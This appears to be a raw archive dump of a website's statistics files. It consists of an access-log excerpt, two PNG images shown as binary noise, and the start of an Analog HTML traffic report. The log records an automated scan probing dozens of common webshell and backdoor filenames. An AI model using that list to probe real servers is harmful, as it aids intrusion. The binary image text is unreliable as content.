HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:25 +0100] "GET /alfa.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:25 +0100] "GET /1.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:25 +0100] "GET /byp.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:25 +0100] "GET /wp-trackback.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:26 +0100] "GET /.well-known/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:26 +0100] "GET /wp-admin/network/plugins.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:26 +0100] "GET /wp-admin/about.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:26 +0100] "GET /gmo.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:27 +0100] "GET /wp-includes/ID3/about.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:27 +0100] "GET /css/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:27 +0100] "GET /wp-includes/SimplePie/wp-login.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:27 +0100] "GET /wp-content/themes/about.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:28 +0100] "GET /filemanager/dialog.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:28 +0100] "GET /wp-admin/maint/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:28 +0100] "GET /wp-includes/customize/about.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:28 +0100] "GET /index/function.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:29 +0100] "GET /uploads/autoload_classmap.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:29 +0100] "GET /wp-includes/style-engine/about.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:29 +0100] "GET /ww1.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:29 +0100] "GET /about/function.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:30 +0100] "GET /admin/function.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:30 +0100] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:30 +0100] "GET /css/colors/blue/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:30 +0100] "GET /security.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:31 +0100] "GET /wp-admin/user/about.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:31 +0100] "GET /wp-admin/js/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:31 +0100] "GET /wp-content/upgrade/about.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:31 +0100] "GET /wp-includes/assets/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:32 +0100] "GET /wp-content/radio.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:32 +0100] "GET /wp-includes/fonts/index.php?p= HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:32 +0100] "GET /.well-known/admin.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:32 +0100] "GET /wp-content/admin.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:32 +0100] "GET /wp-content/plugins/admin.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:33 +0100] "GET /wp-content/themes/twentytwentytwo/index.php?p= HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:33 +0100] "GET /.well-known/log.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:33 +0100] "GET /class.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:34 +0100] "GET /bless5.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:34 +0100] "GET /wp-includes/js/codemirror/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:34 +0100] "GET /wp-includes/block-patterns/index.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:34 +0100] "GET /lock360.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:35 +0100] "GET /f35.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:35 +0100] "GET /ioxi-o1.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:35 +0100] "GET /juuuu.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:35 +0100] "GET /ha.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:36 +0100] "GET /gg.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:36 +0100] "GET /we2.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:36 +0100] "GET /04.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:36 +0100] "GET /333.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:36 +0100] "GET /520.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:37 +0100] "GET /ar.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:37 +0100] "GET /x.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:37 +0100] "GET /xx.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:37 +0100] "GET /gifclass4.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:38 +0100] "GET /wp-freya.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:38 +0100] "GET /2clas.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:38 +0100] "GET /2eaa2.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:38 +0100] "GET /ave.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:39 +0100] "GET /wrt.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:39 +0100] "GET /bibil.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:39 +0100] "GET /radio.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:39 +0100] "GET /files.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:39 +0100] "GET /file7.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:40 +0100] "GET /gifclass.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:40 +0100] "GET /wp-admin/css/colors/midnight/about.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:40 +0100] "GET /nox.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:40 +0100] "GET /file48.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:41 +0100] "GET /info.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:41 +0100] "GET /class9.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:41 +0100] "GET /la.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:41 +0100] "GET /bless11.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:42 +0100] "GET /ccou.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:42 +0100] "GET /ton.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:42 +0100] "GET /403.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:42 +0100] "GET /file9.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:42 +0100] "GET /php.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:43 +0100] "GET /ac.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:43 +0100] "GET /new.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:43 +0100] "GET /new4.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:43 +0100] "GET /pop.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:44 +0100] "GET /az.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:44 +0100] "GET /xaz.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:44 +0100] "GET /up4.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:44 +0100] "GET /1aa.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:45 +0100] "GET /elp.php HTTP/1.1" 404 - "-" "-" 4.189.253.242 - - [05/Dec/2025:16:38:45 +0100] "GET /wtz.php HTTP/1.1" 404 - "-" "-" 54.74.34.195 - - [06/Dec/2025:00:11:24 +0100] "GET / HTTP/1.0" 200 801 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" failref.png 0000644 00000007035 15114762025 0006672 0 ustar 00 �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx��=v�:�� z�i;k>��-`8%����Q��9T6J��! ��Q��p��nw����u��m���Q��w�}�Y8��؏������=�QK���Y��}K�*�x��W�EP�EP�EP�EP�EP�EP�EP�EP�EP�EP�EP�EP�EP�EP�EP�EP�E�zX<ټ^+`q;�O=gT4,)�^�w���$e�f���՟?lX?K��X �V���y�����j��dZdX\~y��U����|_��y1��*",~y����P�i��� �g�}�K��iX�a����N�����W��"��<���P��4+����V�V�ND��/&,��a�D,,~��a����u�2�z��*n� K���a��V?��d�`��o,Lۚ`A3!��L��e��auj��a�mY���R/���9 ,�*V�m�aA�,ͧ��� ,��uq`}a�ۖK29�xS���ͮ�n������\&�BX�Ł5vx�`ۚ`I&��j4B�Є5�W����B��a5�Bm˴�K5o��AlK�� i���ʅa�&��0"K*K�q`M&��V��������0auMJ�j�0㏂�{#8�΄��kو��ou�k�� �í�.twY^E�z�k�����ӓ���eS�|�t�`�ZaXf�)H�Ζ ��/ `�`�9���#a��,�r+V!��2,��RaRZq�^����_y.�a�+�áãa�}8����b>P�R^�5�X�+D��` ���fsXs�Mk�*���+f��'?�JG�e�Y@�5X�K��0Rȍ��X���!��kM��<�tx�t���ce�]ق�X`a��z%��iC�Ϩ�A]�0$��ˋ�Y�\X�<�E�%��l��|�#,Oe�>�K�Y`�e�\,eҍ�-?��'�Vctx ,�-Xf�5���ӫΒC�M��ş��|.-`~��G�;�ٴ�.��i�ҕ� vG�붅���u��i���<Fl��! �郚eX�/����t�`�F��uzz`����J���_� ���ht���V�Y���v��2� ��|h��3,S0���@#6�������YgX�;aF�M+5,(��=ò���nMX�/�� N��<k��`Dݴ�&�F4�gX�0��Fl���o�e ��mV�Ҋ�5oZ,7��=� �r �y��jZtX�Ҳ`y���̈c��Jk�g�a��`�.������Lv �5�jZ�`VXX�/�Ҽe͍���!֩c4,Lj�^~vX�gF�D�r}�O�?.� `=e��5�r^�XX���?�� �o�k���[�k�XXn����GZ���� �e�·iaa�7�5�"��J+9,����[sXޖ�l�M��鰜�e�0|��� �iľi��;�p�xkk���/q�:���oQaF� +x����aĦ��W�`��?�'v��Ȱ���J �aw�&#�uX�`-�m#6o�1��iE���t��B�Ra!hMMk5��@�n�б�� �wӈM�����yVޕG,mĶi��<k��T�������y�^�hE��FL˓g��XXOڇ2,_��o���2�%,!鰬աiC8��7�JK� ��g�a�����ay־VX�.dBXp�u�C�V��(y2X��<k���X�[Ϭ���X����U�Z#VX#VXh� ���f%��Qo��QZ�)�5y�`���g��z^kC�, �=��qoX��`��,@�T2�YUYVFc����Ɲ���^8�������&�0)�[$�E�,)��T��<>K�E�p�:���v��=N�?>F`[�z�Hu�Ny|3#�S��<�9�o�o�u�K+���Nk()-��`���2{ba{��6^Mv˞��Js|cf�%��k���xc��̋��0�!�C[�p�>=(��¹� , �Z��4�/76~+X��V���i��*�,���}X&�E�UX�gaI�}h��/��;N0,��R�Z�g��f�� X�����,�"jX��T<,F'E�e͝)��K�R@Ґk�&�ч>X��Ɣ 8>�39\��LĒ�\��||����2�N��8�>ʜH��+ ,��6��e�a�V���N�����Y��ţ`Q|ho�:���g�Ɣ��R�iľY�X���b�8>kH��q�C�o3��#�B�D�(>��ͳ�b���L,:䚟Bw�Vp�W9��Y��7�E���loGUX��E�a��IaE��>t������r��u Xj%u�~��&�և� ���WA�`a}�Kg�C^z����ܯv�ʒñW[ (,�C�TJwDTDŽE�Jg3%���a �x����MNX.{;ˈ�(�#K���W��ނ�֙�Ƈ�g���1><f�F ��L6X�.����>,V�-�S�0-��+�O+W�:w��]f4��B��]X�a�|X&�<[Z'w���ۑ���ÓV�E�V�݅^X9�=<{a%����ra�����.��J���V�E�Vj�߅�R\z��J��òa�=}� .�J�� kV��xJ(��`�H>��`��ӥaXE�2�t� �бB����*��r�|�)`�p��`��a�B��Btab�0�(#:>,ĄX1F�.���}XJ�B���Z�eVL�2}XL�B��0�u�&D��0�c�&��q��� "aq2���C¢������"����Câ�����â�����â����#�"������b��[�ř�����<�h�N|�;�;���"=Ȩ��[e�"�b<l�5�L:����V|,U�e+>�j�N�Z+��(��Z1���� %;�W$��ͧ��NѰz7v�Q��^U�V���l^���>�*,�*,�*,�*,�*,�*,�*,�*,�*,�*,�*,�f�d�r�g���� �y����#�Z��<Hě���泹8����'�mXK������7��G�e��N��P�Pw�;�%e����b {��� �c�z\1��`.�i둜�M�d}CΦ�p=�aN�w�I�vAt�p�F�����za7VS��tRS�ȑ��jnLG�f@@���@��>X�{�Q��_�,U�qj̀5�F�k�x���i:̝1_�l',u�[����j��Ve1����45�9��*�M��lǾ����`6|�l��[� ���c���8��r��n ,n�R�>̀2�NF�a�&*ƞ͍�c�k ���h�t��n�.�nRR����&��UoԳ�h��;i��Q.|�I?}��L>�vw<���<���5_� ����������������������������R�dJ��U(]���������=�������ַ�gb��ż�5 IEND�B`� size.png 0000644 00000004625 15114762025 0006236 0 ustar 00 �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� &IDATx���Mr�6`���l��7p�q� ^xo�NV�~H��H?�`K���x4�,}�kR%V��%�����B=yR��~���U����i�z�%���X�� ��BD�,D�BD�,D�BD�,D�BD�,D�B�8�&{,�� ��n�S?�������ϐ����g_�L����3c}}}r_]9XzE��b��2����'�5�.�Zx�~ke���-�]�b��'�5v�� �� z��V��VЏ���tΣ�v`]��}�'��}V{����s���`�ʱ�p,o�X���wЇ�b�6��9gHa]���2X_>�onZ@���`}^�@�ָ.��u��<"0��cA���e � ,�� 0��X���kV�*��[P�������Vzl1Ê �=��u���b�-a+5�xa�K��zq�Ed��(a+QDVG�D -�s+^DV�YH���"�* )��Ă`�٬I`%'��fM+YB�3�ҧ�$�XX ,&E�c���B6K�t,�i���Q'��>B��=�au���nw�y�aA&���Y����;s��AǏ��pVÂ��`�^���Et��n�,4�o�/��B5��T�k�+4�"S+�ի�]�V�3���X���ce�+����,R������=t��Qe.��Vp�]Xk��� --g�ª)A,h�X�2x5�/���U��,DBX����#�AX��--����R�0,��9�*�<������p�5�^u��um��=�G,,�gim��ݫ-V�+��4�}٬�Xʼ�.�B����e?�^i�9=�bmWV_r qXБ���L����,�~h�X���Y���`AZ�YZ,�{��ϲW�{�uV��a�Z�Ī��4dd V�X�;bU�MC�Y�p-�b�=4�����P`=#Z��rv�������rv��W�[4��b�C��rv��g���$��J�b���|����J��B�� �Bwhy�6�W������J�Ϻ���K���*vfea�GV �ٽ�;\��g��Ur�>PÚ_a!F',��U� ���%X��d�u���'�`!"X��`�FV�X��b��#����B�9�K��X� �` �6X=Ҫi,-X��vd �`���V|�.��v����·���Bc����(a�X%l+ǪU,���rV�XY�U�L�&�2K�$Vn ��ʶj+ﬡM��� �G�_�zwhr���9�#%l +���A�cV�� ��c%��`��u��ma�ℕZ���T;��XVSXGVSXǭ�:^B^X��!A +>"��xaEzx��aL�-DaQ�f�(J� +4�HJX��B`є� ,���f����ay'<��V=ߡ�#j��U�bQ��,�6�EVB�X:kS�|�(B������6=�,a�-`QZqǢ;k�uZ������1��%�|a��hK�Kߣ���0�C�I���/�8�[,M?��oakXZ����â.!c,M]�[����KK �.a,�+��[��^Z�/,��$�E�C-�a�.-+�E��8,��a�cю'���o�b�M-+�EUDK�0�cQ��GSX4K�šP%�H�LJ�Ƣ("������z���:<��,, �ѩ�fb����O AX��Ȩ�0�E�fTB V��!���ae�-NKA�2�����XYc��Rp����� ��1�� ,��B�-nKa�T�jbϮ�(,T�uP�Md�A�Ă6�cx�� �y_n�r^��b%��͖*+^Ev/q����b�t�O�����@�L��륩U5&˴q̋��U5� �|d����j(���`!"X�"���`!"X�"���`!"X��~&k��^G_*�� ���'���j�U���zQ,����̿�}B���_�a X�{�k��݆��:]9�z�Ao0�k�e���ޚ�ug�{���ӽY��f��_t�Ò���ȴ@�s��X�`����h��m�ս���{��[Z�n��:�*?5�O�,�ͼ��5v��#�tˮk�7�#��n�_��=NN �~8>�e});E�Ƿ��YYj���ϸ��k}��:U�� a��<WF��suÚFҌ5^ַQv�l��]j�|���B�ײ�-��~�i�v��֫o�#��������1C}u��Ӑ���e�O�i���,l������7�]�]���r'��=��Q��.���BD�,D�BD�,D�BD�,D�BD��X����U�Ӏ�t���%�_�,,p��,,p~�EP@��٨ IEND�B`� 2.html 0000644 00000141040 15114762025 0005576 0 ustar 00 <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for ia.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://ia.imators.com/">ia.imators.com</a></h1> <p class="analysisspan">Program started on Thu, Feb 27 2025 at 1:21 PM. <br />Analyzed requests from Wed, May 15 2024 at 10:34 PM to Thu, Feb 27 2025 at 6:50 AM (287.34 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Feb 27 2025 at 1:21 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 757 (5) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 513 (5) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 608 (2) <br /><span class="gensumtitle">Redirected requests:</span> 2 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 34 (187) <br /><span class="gensumtitle">Distinct hosts served:</span> 376 (438) <br /><span class="gensumtitle">Data transferred:</span> 705.73 kilobytes (2.49 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 2.46 kilobytes (364 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">May 2024</td><td class="R">162</td><td class="P">101</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Jun 2024</td><td class="R">69</td><td class="P">63</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2024</td><td class="R">141</td><td class="P">97</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2024</td><td class="R">45</td><td class="P">41</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Sep 2024</td><td class="R">148</td><td class="P">82</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Oct 2024</td><td class="R">24</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Nov 2024</td><td class="R">59</td><td class="P">31</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">26</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">63</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">20</td><td class="P">17</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: May 2024 (101 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">97</td><td class="P">79</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">94</td><td class="P">61</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">100</td><td class="P">76</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">96</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">146</td><td class="P">77</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">108</td><td class="P">88</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">116</td><td class="P">72</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">22</td><td class="P">20</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">28</td><td class="P">24</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">37</td><td class="P">17</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td 